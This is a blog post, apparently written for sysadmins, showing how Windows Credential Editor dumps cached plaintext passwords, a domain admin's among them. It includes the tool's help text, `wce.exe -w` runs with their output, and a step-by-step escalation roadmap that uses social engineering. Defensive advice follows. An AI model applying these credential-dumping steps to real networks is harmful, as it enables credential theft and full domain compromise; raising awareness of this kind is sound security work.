Privilege escalation using Windows Credential Editor

As I wrote in this article is often trivial to become local admin on MS system if there isn’t a strong and clear security policy, but it’s also the same in a Unix environment.
What is the next step? If an attacker becomes local admin of a company’s PC the next step is to become a more powerfull administrator; so, if the PC is joined to a Domain, the objective will be to become a Domain Admin in order to completly compromise the whole network.
Here’s a tool that can be used to reach this scope in particular conditions: Windows Credentials Editor (WCE v1.3 beta)
It’s quite simple to use:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>wce.exe -h
WCE v1.41beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)

Use -h for help.
Options:
        -l              List logon sessions and NTLM credentials (default).
        -s              Changes NTLM credentials of current logon session.
                        Parameters: <UserName>:<DomainName>:<LMHash>:<NTHash>.
        -r              Lists logon sessions and NTLM credentials indefinitely.
                        Refreshes every 5 seconds if new sessions are found.
                        Optional: -r<refresh interval>.
        -c              Run <cmd> in a new session with the specified NTLM credentials.
                        Parameters: <cmd>.
        -e              Lists logon sessions NTLM credentials indefinitely.
                        Refreshes every time a logon event occurs.
        -o              saves all output to a file.
                        Parameters: <filename>.
        -i              Specify LUID instead of use current logon session.
                        Parameters: <luid>.
        -d              Delete NTLM credentials from logon session.
                        Parameters: <luid>.
        -a              Use Addresses.
                        Parameters: <addresses>
        -f              Force 'safe mode'.
        -g              Generate LM & NT Hash.
                        Parameters: <password>.
        -K              Dump Kerberos tickets to file (unix & 'windows wce' format)
        -k              Read Kerberos tickets from file and insert into Windows cache
        -w              Dump cleartext passwords stored by the digest authentication package
        -v              verbose output.

Let’s try to run WCE using the -w option. Note that you must be a priveliged user to run this tool.

C:\Documents and Settings\Administrator>wce.exe -w
WCE v1.41beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)

Use -h for help.

Administrator\CLI01:Pa$$w0rdZ

C:\Documents and Settings\Administrator>

It’s pretty simple: WCE shows every passwords cached; in clear text.
Let’s assume that the pc CLI01 is joined to a domain and let’s see what happen if some service is started using domain admin password:

C:\Documents and Settings\Administrator>wce.exe -w
WCE v1.41beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)

Use -h for help.

Administrator\mydomain.local:MyPaZZw0rd_IsW3ry$tronG
Administrator\CLI01:Pa$$w0rdZ

WOW! The domain admin password stored locally is showed.

How many service are misconfigured in your network? Let’s hope very few because you are a very good sysadmin and no service starts with domain sensitive password, but what about social engeneering?
Each time a user is begging for a password for an installation or he asks to you something that leads to digit your admin password on his pc, is it a legittimate request or does he wants your password cached?
So, you domain admin, what kind of password do you use on company users pc? The domain-admin-super-God password or the local pc password?

Basing ourselves on this and the previous post let’s now compile an hypothetical roadmap from simple user to domain admin:
1- Boot the company Microsoft PC using a CD/DVD with a bootable operating System
2- Use the sethc “feature” to become local admin
3- Begging for a domain admin password (“Please I need the latest java update, but I need your password”, “I’m trying to add a new charset, but the pc is asking for an admin password…”)
4- Run WCE and become domain admin
5- Use some other tool like pstool and collect the password of every user of the network

I think that these are the defences that a network/system admin can adopt:
1- No external device boot allowed and PC and case locked
2- No remediation on this (may be some domain policy). Remember that also Linux has a level 1 booting.
3- Users are invasive and dangerous, even if they don’t want your password. So Always log on their PCs always with the lowest privileges you can.
4- WCE must blocked to users (AV rule, policy, firewall)
5- If an attacker reach this point you will probably spend the next weeks searching another job in another city

The scope of this post is to make system admininistrators and everyone else aware on how to take care about IT security.
Many times, working as sysadmin, we make mistakes, we are pressured and we sometimes left open ports saying “I will patch them later”, but we always have to remember what risks we are taking.
An attack, talking about computer and network, often starts from the bottom and, little by little, try to reach the top; a small door open gives the way for another gate an so on. This process is called Privilege Escalation.

Leave a Reply

Your email address will not be published.